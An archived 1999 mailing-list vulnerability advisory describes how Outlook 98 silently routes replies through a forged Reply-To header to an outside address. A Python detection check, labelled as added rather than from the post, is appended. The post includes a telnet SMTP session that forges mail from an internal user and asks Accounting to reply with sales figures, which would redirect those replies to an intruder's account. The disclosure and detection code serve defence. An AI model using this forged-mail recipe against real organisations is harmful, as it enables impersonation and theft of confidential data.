Outlook 98 allows spoofing internal users

From: Nate Lawson (nateat_private)
Date: Tue Apr 20 1999 - 15:10:05 PDT


    Problem: Outlook uses a sender's Reply-To address silently, allowing
             a user to inadvertently send data to an Internet mail account
             when intending to reply to an internal, trusted user.
    
    Impact: Anyone on the Internet can spoof a trusted internal Exchange user
            and get replies sent back to themselves without the user knowing they
            weren't responding to another internal user.
    
    How to reproduce:
    
    1.  Spoof mail as an internal user with a Reply-To address claiming to be
        an internal user, but an address of an Internet account, say hotmail.
    2.  Go into Outlook and read the mail.  The mail looks like it was internally
        generated but viewing the full Internet headers under View->Options
        shows the bogus Reply-To header.
    3.  Hit Reply in Outlook.  The To: field looks like it's going to a valid
        internal user, but right clicking on it and choosing Properties shows
        that the internal user it is sending the reply to is actually an Internet
        address.
    4.  Enter some text and hit Send.  Observe that the mail went to the attacker's
        account, not the internal one.
    
    A quick script:
    
    {root 5:00pm} ~> telnet mail.example.com 25
    Trying 10.20.2.5...
    Connected to mail.example.com.
    Escape character is '^]'.
    220 mail.example.com ESMTP Server (Microsoft Exchange Internet Mail Service 5.5.2448.0) ready
    helo losebag
    250 OK
    mail from:<>
    250 OK - mail from <>
    rcpt to:<accountingat_private>
    250 OK - Recipient <accountingat_private>
    data
    354 Send data.  End with CRLF.CRLF
    From: Nate Lawson
    To: Accounting
    Reply To: Nate Lawson<intruderat_private>
    Subject: important!
    
    Please reply with the latest copy of our sales figures!
    
    Thanks,
    Nate
    .
    250 OK
    quit
    221 closing connection
    Connection closed by foreign host.
    
    Now, a reply to the email will go not to the trusted internal user Nate
    Lawson <nlawsonat_private> but to the attacker, <intruderat_private>.
    Worse, the user sees no indication that the mail is outward-bound!  The
    To: field on the reply simply shows "Nate Lawson", a valid internal user.
    
    Affected programs:  Only tested on Outlook 98
    
    Known use of this bug to get confidential information:  none yet
    
    Suggested Fix: always show the full email address of any recipient that is
    not local (i.e. usernameat_private would be hidden but any instance of
    userat_private would be shown)
    
    Microsoft has been notified, but claimed this was a weakness in SMTP and
    would not be fixed until a secure successor to SMTP is implemented. They
    obviously missed the point -- the error is not in that mail can be forged,
    but that Outlook allows a user to respond to a message that looks local
    and legitimate, but is actually destined for an outside address.
    
    -Nate
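The check below is an added example, not code from the post: it applies the suggested fix (show the full address of any reply recipient whose domain is not local) and flags messages whose From claims a local user while Reply-To points outside. The sample message is constructed to match the shape of the one in the post, with placeholder domains (corp.example, webmail.example) standing in for the obfuscated real ones.

```python
from email import message_from_string
from email.utils import getaddresses, parseaddr

# Assumed local domain; the archive hides the real one.
LOCAL_DOMAINS = {"corp.example"}

# Constructed sample: same headers as the post's telnet session, with a
# standard "Reply-To:" header and placeholder domains.
SPOOFED = """\
From: Nate Lawson <nlawson@corp.example>
To: Accounting <accounting@corp.example>
Reply-To: Nate Lawson <intruder@webmail.example>
Subject: important!

Please reply with the latest copy of our sales figures!
"""

# Constructed benign message for comparison: no Reply-To at all.
LEGIT = SPOOFED.replace("Reply-To: Nate Lawson <intruder@webmail.example>\n", "")


def reply_targets(raw):
    """(name, addr) pairs a reply would be sent to: Reply-To silently wins over From."""
    msg = message_from_string(raw)
    headers = msg.get_all("Reply-To") or msg.get_all("From") or []
    return getaddresses(headers)


def is_local(addr):
    return addr.rpartition("@")[2].lower() in LOCAL_DOMAINS


def display_recipient(name, addr):
    """The post's suggested fix: hide the address only for local users."""
    if is_local(addr):
        return name or addr
    return f"{name} <{addr}>" if name else addr


def reply_to_redirects_externally(raw):
    """Detection rule: From claims a local sender, but Reply-To leaves the organisation."""
    msg = message_from_string(raw)
    _, from_addr = parseaddr(msg.get("From", ""))
    reply_to = msg.get_all("Reply-To")
    if not reply_to or not is_local(from_addr):
        return False
    return any(not is_local(addr) for _, addr in getaddresses(reply_to))


def check(raw):
    """Return (what the reply window should display, whether to warn the user)."""
    shown = [display_recipient(n, a) for n, a in reply_targets(raw)]
    return shown, reply_to_redirects_externally(raw)
```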
    



    This archive was generated by hypermail 2b30 : Fri Apr 13 2001 - 14:43:21 PDT